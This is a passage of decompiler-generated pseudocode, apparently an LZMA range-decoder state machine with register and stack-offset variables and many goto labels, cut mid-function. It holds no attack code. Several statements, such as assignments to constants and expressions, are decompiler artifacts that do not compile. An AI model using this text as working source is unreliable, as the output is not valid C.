                                                												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                											}
                                                											if( *(_t613 - 0x10) >= 0x1000000) {
                                                												goto L139;
                                                											}
                                                										case 5:
                                                											goto L137;
                                                										case 6:
                                                											__edx = 0;
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												__eax =  *(__ebp - 4);
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) = 1;
                                                												 *(__ebp - 0x84) = 7;
                                                												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                												while(1) {
                                                													 *(_t613 - 0x54) = _t606;
                                                													goto L133;
                                                												}
                                                											}
                                                											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                											__esi =  *(__ebp - 0x60);
                                                											__cl = 8;
                                                											__cl = 8 -  *(__ebp - 0x3c);
                                                											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                											__ecx =  *(__ebp - 0x3c);
                                                											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                											__ecx =  *(__ebp - 4);
                                                											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                											__eflags =  *(__ebp - 0x38) - 4;
                                                											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                											if( *(__ebp - 0x38) >= 4) {
                                                												__eflags =  *(__ebp - 0x38) - 0xa;
                                                												if( *(__ebp - 0x38) >= 0xa) {
                                                													_t98 = __ebp - 0x38;
                                                													 *_t98 =  *(__ebp - 0x38) - 6;
                                                													__eflags =  *_t98;
                                                												} else {
                                                													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                												}
                                                											} else {
                                                												 *(__ebp - 0x38) = 0;
                                                											}
                                                											__eflags =  *(__ebp - 0x34) - __edx;
                                                											if( *(__ebp - 0x34) == __edx) {
                                                												__ebx = 0;
                                                												__ebx = 1;
                                                												goto L61;
                                                											} else {
                                                												__eax =  *(__ebp - 0x14);
                                                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                												__eflags = __eax -  *(__ebp - 0x74);
                                                												if(__eax >=  *(__ebp - 0x74)) {
                                                													__eax = __eax +  *(__ebp - 0x74);
                                                													__eflags = __eax;
                                                												}
                                                												__ecx =  *(__ebp - 8);
                                                												__ebx = 0;
                                                												__ebx = 1;
                                                												__al =  *((intOrPtr*)(__eax + __ecx));
                                                												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                												goto L41;
                                                											}
                                                										case 7:
                                                											__eflags =  *(__ebp - 0x40) - 1;
                                                											if( *(__ebp - 0x40) != 1) {
                                                												__eax =  *(__ebp - 0x24);
                                                												 *(__ebp - 0x80) = 0x16;
                                                												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                												__eax =  *(__ebp - 0x28);
                                                												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                												__eax =  *(__ebp - 0x2c);
                                                												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                												__eax = 0;
                                                												__eflags =  *(__ebp - 0x38) - 7;
                                                												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                												__al = __al & 0x000000fd;
                                                												__eax = (__eflags >= 0) - 1 + 0xa;
                                                												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                												__eax =  *(__ebp - 4);
                                                												__eax =  *(__ebp - 4) + 0x664;
                                                												__eflags = __eax;
                                                												 *(__ebp - 0x58) = __eax;
                                                												goto L69;
                                                											}
                                                											__eax =  *(__ebp - 4);
                                                											__ecx =  *(__ebp - 0x38);
                                                											 *(__ebp - 0x84) = 8;
                                                											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                											while(1) {
                                                												 *(_t613 - 0x54) = _t606;
                                                												goto L133;
                                                											}
                                                										case 8:
                                                											goto L0;
                                                										case 9:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												goto L89;
                                                											}
                                                											__eflags =  *(__ebp - 0x60);
                                                											if( *(__ebp - 0x60) == 0) {
                                                												goto L171;
                                                											}
                                                											__eax = 0;
                                                											__eflags =  *(__ebp - 0x38) - 7;
                                                											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                											__eflags = _t258;
                                                											0 | _t258 = _t258 + _t258 + 9;
                                                											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                											goto L75;
                                                										case 0xa:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												__eax =  *(__ebp - 4);
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x84) = 0xb;
                                                												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                												while(1) {
                                                													 *(_t613 - 0x54) = _t606;
                                                													goto L133;
                                                												}
                                                											}
                                                											__eax =  *(__ebp - 0x28);
                                                											goto L88;
                                                										case 0xb:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												__ecx =  *(__ebp - 0x24);
                                                												__eax =  *(__ebp - 0x20);
                                                												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                											} else {
                                                												__eax =  *(__ebp - 0x24);
                                                											}
                                                											__ecx =  *(__ebp - 0x28);
                                                											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                											L88:
                                                											__ecx =  *(__ebp - 0x2c);
                                                											 *(__ebp - 0x2c) = __eax;
                                                											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                											L89:
                                                											__eax =  *(__ebp - 4);
                                                											 *(__ebp - 0x80) = 0x15;
                                                											__eax =  *(__ebp - 4) + 0xa68;
                                                											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                											goto L69;
                                                										case 0xc:
                                                											L99:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0xc;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t334 = __ebp - 0x70;
                                                											 *_t334 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t334;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											__eax =  *(__ebp - 0x2c);
                                                											goto L101;
                                                										case 0xd:
                                                											L37:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0xd;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t122 = __ebp - 0x70;
                                                											 *_t122 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t122;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											L39:
                                                											__eax =  *(__ebp - 0x40);
                                                											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                												goto L48;
                                                											}
                                                											__eflags = __ebx - 0x100;
                                                											if(__ebx >= 0x100) {
                                                												goto L54;
                                                											}
                                                											L41:
                                                											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                											__ecx =  *(__ebp - 0x58);
                                                											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                											 *(__ebp - 0x48) = __eax;
                                                											__eax = __eax + 1;
                                                											__eax = __eax << 8;
                                                											__eax = __eax + __ebx;
                                                											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                											__ax =  *__esi;
                                                											 *(__ebp - 0x54) = __esi;
                                                											__edx = __ax & 0x0000ffff;
                                                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                											__eflags =  *(__ebp - 0xc) - __ecx;
                                                											if( *(__ebp - 0xc) >= __ecx) {
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                												__cx = __ax;
                                                												 *(__ebp - 0x40) = 1;
                                                												__cx = __ax >> 5;
                                                												__eflags = __eax;
                                                												__ebx = __ebx + __ebx + 1;
                                                												 *__esi = __ax;
                                                											} else {
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                												 *(__ebp - 0x10) = __ecx;
                                                												0x800 = 0x800 - __edx;
                                                												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                												__ebx = __ebx + __ebx;
                                                												 *__esi = __cx;
                                                											}
                                                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                											 *(__ebp - 0x44) = __ebx;
                                                											if( *(__ebp - 0x10) >= 0x1000000) {
                                                												goto L39;
                                                											} else {
                                                												goto L37;
                                                											}
                                                										case 0xe:
                                                											L46:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0xe;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t156 = __ebp - 0x70;
                                                											 *_t156 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t156;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											while(1) {
                                                												L48:
                                                												__eflags = __ebx - 0x100;
                                                												if(__ebx >= 0x100) {
                                                													break;
                                                												}
                                                												__eax =  *(__ebp - 0x58);
                                                												__edx = __ebx + __ebx;
                                                												__ecx =  *(__ebp - 0x10);
                                                												__esi = __edx + __eax;
                                                												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                												__ax =  *__esi;
                                                												 *(__ebp - 0x54) = __esi;
                                                												__edi = __ax & 0x0000ffff;
                                                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                												__eflags =  *(__ebp - 0xc) - __ecx;
                                                												if( *(__ebp - 0xc) >= __ecx) {
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                													__cx = __ax;
                                                													_t170 = __edx + 1; // 0x1
                                                													__ebx = _t170;
                                                													__cx = __ax >> 5;
                                                													__eflags = __eax;
                                                													 *__esi = __ax;
                                                												} else {
                                                													 *(__ebp - 0x10) = __ecx;
                                                													0x800 = 0x800 - __edi;
                                                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                													__ebx = __ebx + __ebx;
                                                													 *__esi = __cx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												 *(__ebp - 0x44) = __ebx;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													continue;
                                                												} else {
                                                													goto L46;
                                                												}
                                                											}
                                                											L54:
                                                											_t173 = __ebp - 0x34;
                                                											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                											__eflags =  *_t173;
                                                											goto L55;
                                                										case 0xf:
                                                											L58:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0xf;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t203 = __ebp - 0x70;
                                                											 *_t203 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t203;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											L60:
                                                											__eflags = __ebx - 0x100;
                                                											if(__ebx >= 0x100) {
                                                												L55:
                                                												__al =  *(__ebp - 0x44);
                                                												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                												goto L56;
                                                											}
                                                											L61:
                                                											__eax =  *(__ebp - 0x58);
                                                											__edx = __ebx + __ebx;
                                                											__ecx =  *(__ebp - 0x10);
                                                											__esi = __edx + __eax;
                                                											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                											__ax =  *__esi;
                                                											 *(__ebp - 0x54) = __esi;
                                                											__edi = __ax & 0x0000ffff;
                                                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                											__eflags =  *(__ebp - 0xc) - __ecx;
                                                											if( *(__ebp - 0xc) >= __ecx) {
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                												__cx = __ax;
                                                												_t217 = __edx + 1; // 0x1
                                                												__ebx = _t217;
                                                												__cx = __ax >> 5;
                                                												__eflags = __eax;
                                                												 *__esi = __ax;
                                                											} else {
                                                												 *(__ebp - 0x10) = __ecx;
                                                												0x800 = 0x800 - __edi;
                                                												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                												__ebx = __ebx + __ebx;
                                                												 *__esi = __cx;
                                                											}
                                                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                											 *(__ebp - 0x44) = __ebx;
                                                											if( *(__ebp - 0x10) >= 0x1000000) {
                                                												goto L60;
                                                											} else {
                                                												goto L58;
                                                											}
                                                										case 0x10:
                                                											L109:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0x10;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t365 = __ebp - 0x70;
                                                											 *_t365 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t365;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											goto L111;
                                                										case 0x11:
                                                											L69:
                                                											__esi =  *(__ebp - 0x58);
                                                											 *(__ebp - 0x84) = 0x12;
                                                											while(1) {
                                                												 *(_t613 - 0x54) = _t606;
                                                												goto L133;
                                                											}
                                                										case 0x12:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												__eax =  *(__ebp - 0x58);
                                                												 *(__ebp - 0x84) = 0x13;
                                                												__esi =  *(__ebp - 0x58) + 2;
                                                												while(1) {
                                                													 *(_t613 - 0x54) = _t606;
                                                													goto L133;
                                                												}
                                                											}
                                                											__eax =  *(__ebp - 0x4c);
                                                											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                											__ecx =  *(__ebp - 0x58);
                                                											__eax =  *(__ebp - 0x4c) << 4;
                                                											__eflags = __eax;
                                                											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                											goto L130;
                                                										case 0x13:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												_t469 = __ebp - 0x58;
                                                												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                												__eflags =  *_t469;
                                                												 *(__ebp - 0x30) = 0x10;
                                                												 *(__ebp - 0x40) = 8;
                                                												L144:
                                                												 *(__ebp - 0x7c) = 0x14;
                                                												goto L145;
                                                											}
                                                											__eax =  *(__ebp - 0x4c);
                                                											__ecx =  *(__ebp - 0x58);
                                                											__eax =  *(__ebp - 0x4c) << 4;
                                                											 *(__ebp - 0x30) = 8;
                                                											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                											L130:
                                                											 *(__ebp - 0x58) = __eax;
                                                											 *(__ebp - 0x40) = 3;
                                                											goto L144;
                                                										case 0x14:
                                                											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                											__eax =  *(__ebp - 0x80);
                                                											 *(_t613 - 0x88) = _t533;
                                                											goto L1;
                                                										case 0x15:
                                                											__eax = 0;
                                                											__eflags =  *(__ebp - 0x38) - 7;
                                                											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                											__al = __al & 0x000000fd;
                                                											__eax = (__eflags >= 0) - 1 + 0xb;
                                                											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                											goto L120;
                                                										case 0x16:
                                                											__eax =  *(__ebp - 0x30);
                                                											__eflags = __eax - 4;
                                                											if(__eax >= 4) {
                                                												_push(3);
                                                												_pop(__eax);
                                                											}
                                                											__ecx =  *(__ebp - 4);
                                                											 *(__ebp - 0x40) = 6;
                                                											__eax = __eax << 7;
                                                											 *(__ebp - 0x7c) = 0x19;
                                                											 *(__ebp - 0x58) = __eax;
                                                											goto L145;
                                                										case 0x17:
                                                											L145:
                                                											__eax =  *(__ebp - 0x40);
                                                											 *(__ebp - 0x50) = 1;
                                                											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                											goto L149;
                                                										case 0x18:
                                                											L146:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0x18;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t484 = __ebp - 0x70;
                                                											 *_t484 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t484;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											L148:
                                                											_t487 = __ebp - 0x48;
                                                											 *_t487 =  *(__ebp - 0x48) - 1;
                                                											__eflags =  *_t487;
                                                											L149:
                                                											__eflags =  *(__ebp - 0x48);
                                                											if( *(__ebp - 0x48) <= 0) {
                                                												__ecx =  *(__ebp - 0x40);
                                                												__ebx =  *(__ebp - 0x50);
                                                												0 = 1;
                                                												__eax = 1 << __cl;
                                                												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                												__eax =  *(__ebp - 0x7c);
                                                												 *(__ebp - 0x44) = __ebx;
                                                												while(1) {
                                                													 *(_t613 - 0x88) = _t533;
                                                													goto L1;
                                                												}
                                                											}
                                                											__eax =  *(__ebp - 0x50);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                											__eax =  *(__ebp - 0x58);
                                                											__esi = __edx + __eax;
                                                											 *(__ebp - 0x54) = __esi;
                                                											__ax =  *__esi;
                                                											__edi = __ax & 0x0000ffff;
                                                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                											__eflags =  *(__ebp - 0xc) - __ecx;
                                                											if( *(__ebp - 0xc) >= __ecx) {
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                												__cx = __ax;
                                                												__cx = __ax >> 5;
                                                												__eax = __eax - __ecx;
                                                												__edx = __edx + 1;
                                                												__eflags = __edx;
                                                												 *__esi = __ax;
                                                												 *(__ebp - 0x50) = __edx;
                                                											} else {
                                                												 *(__ebp - 0x10) = __ecx;
                                                												0x800 = 0x800 - __edi;
                                                												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                												 *__esi = __cx;
                                                											}
                                                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                											if( *(__ebp - 0x10) >= 0x1000000) {
                                                												goto L148;
                                                											} else {
                                                												goto L146;
                                                											}
                                                										case 0x19:
                                                											__eflags = __ebx - 4;
                                                											if(__ebx < 4) {
                                                												 *(__ebp - 0x2c) = __ebx;
                                                												L119:
                                                												_t393 = __ebp - 0x2c;
                                                												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                												__eflags =  *_t393;
                                                												L120:
                                                												__eax =  *(__ebp - 0x2c);
                                                												__eflags = __eax;
                                                												if(__eax == 0) {
                                                													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                													goto L170;
                                                												}
                                                												__eflags = __eax -  *(__ebp - 0x60);
                                                												if(__eax >  *(__ebp - 0x60)) {
                                                													goto L171;
                                                												}
                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                												__eax =  *(__ebp - 0x30);
                                                												_t400 = __ebp - 0x60;
                                                												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                												__eflags =  *_t400;
                                                												goto L123;
                                                											}
                                                											__ecx = __ebx;
                                                											__eax = __ebx;
                                                											__ecx = __ebx >> 1;
                                                											__eax = __ebx & 0x00000001;
                                                											__ecx = (__ebx >> 1) - 1;
                                                											__al = __al | 0x00000002;
                                                											__eax = (__ebx & 0x00000001) << __cl;
                                                											__eflags = __ebx - 0xe;
                                                											 *(__ebp - 0x2c) = __eax;
                                                											if(__ebx >= 0xe) {
                                                												__ebx = 0;
                                                												 *(__ebp - 0x48) = __ecx;
                                                												L102:
                                                												__eflags =  *(__ebp - 0x48);
                                                												if( *(__ebp - 0x48) <= 0) {
                                                													__eax = __eax + __ebx;
                                                													 *(__ebp - 0x40) = 4;
                                                													 *(__ebp - 0x2c) = __eax;
                                                													__eax =  *(__ebp - 4);
                                                													__eax =  *(__ebp - 4) + 0x644;
                                                													__eflags = __eax;
                                                													L108:
                                                													__ebx = 0;
                                                													 *(__ebp - 0x58) = __eax;
                                                													 *(__ebp - 0x50) = 1;
                                                													 *(__ebp - 0x44) = 0;
                                                													 *(__ebp - 0x48) = 0;
                                                													L112:
                                                													__eax =  *(__ebp - 0x40);
                                                													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                														_t391 = __ebp - 0x2c;
                                                														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                														__eflags =  *_t391;
                                                														goto L119;
                                                													}
                                                													__eax =  *(__ebp - 0x50);
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                													__eax =  *(__ebp - 0x58);
                                                													__esi = __edi + __eax;
                                                													 *(__ebp - 0x54) = __esi;
                                                													__ax =  *__esi;
                                                													__ecx = __ax & 0x0000ffff;
                                                													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                													__eflags =  *(__ebp - 0xc) - __edx;
                                                													if( *(__ebp - 0xc) >= __edx) {
                                                														__ecx = 0;
                                                														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                														__ecx = 1;
                                                														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                														__ebx = 1;
                                                														__ecx =  *(__ebp - 0x48);
                                                														__ebx = 1 << __cl;
                                                														__ecx = 1 << __cl;
                                                														__ebx =  *(__ebp - 0x44);
                                                														__ebx =  *(__ebp - 0x44) | __ecx;
                                                														__cx = __ax;
                                                														__cx = __ax >> 5;
                                                														__eax = __eax - __ecx;
                                                														__edi = __edi + 1;
                                                														__eflags = __edi;
                                                														 *(__ebp - 0x44) = __ebx;
                                                														 *__esi = __ax;
                                                														 *(__ebp - 0x50) = __edi;
                                                													} else {
                                                														 *(__ebp - 0x10) = __edx;
                                                														0x800 = 0x800 - __ecx;
                                                														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                														 *__esi = __dx;
                                                													}
                                                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                													if( *(__ebp - 0x10) >= 0x1000000) {
                                                														L111:
                                                														_t368 = __ebp - 0x48;
                                                														 *_t368 =  *(__ebp - 0x48) + 1;
                                                														__eflags =  *_t368;
                                                														goto L112;
                                                													} else {
                                                														goto L109;
                                                													}
                                                												}
                                                												__ecx =  *(__ebp - 0xc);
                                                												__ebx = __ebx + __ebx;
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                												 *(__ebp - 0x44) = __ebx;
                                                												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                													__ecx =  *(__ebp - 0x10);
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                													__ebx = __ebx | 0x00000001;
                                                													__eflags = __ebx;
                                                													 *(__ebp - 0x44) = __ebx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													L101:
                                                													_t338 = __ebp - 0x48;
                                                													 *_t338 =  *(__ebp - 0x48) - 1;
                                                													__eflags =  *_t338;
                                                													goto L102;
                                                												} else {
                                                													goto L99;
                                                												}
                                                											}
                                                											__edx =  *(__ebp - 4);
                                                											__eax = __eax - __ebx;
                                                											 *(__ebp - 0x40) = __ecx;
                                                											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                											goto L108;
                                                										case 0x1a:
                                                											L56:
                                                											__eflags =  *(__ebp - 0x64);
                                                											if( *(__ebp - 0x64) == 0) {
                                                												 *(__ebp - 0x88) = 0x1a;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x68);
                                                											__al =  *(__ebp - 0x5c);
                                                											__edx =  *(__ebp - 8);
                                                											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                											 *( *(__ebp - 0x68)) = __al;
                                                											__ecx =  *(__ebp - 0x14);
                                                											 *(__ecx +  *(__ebp - 8)) = __al;
                                                											__eax = __ecx + 1;
                                                											__edx = 0;
                                                											_t192 = __eax %  *(__ebp - 0x74);
                                                											__eax = __eax /  *(__ebp - 0x74);
                                                											__edx = _t192;
                                                											goto L79;
                                                										case 0x1b:
                                                											L75:
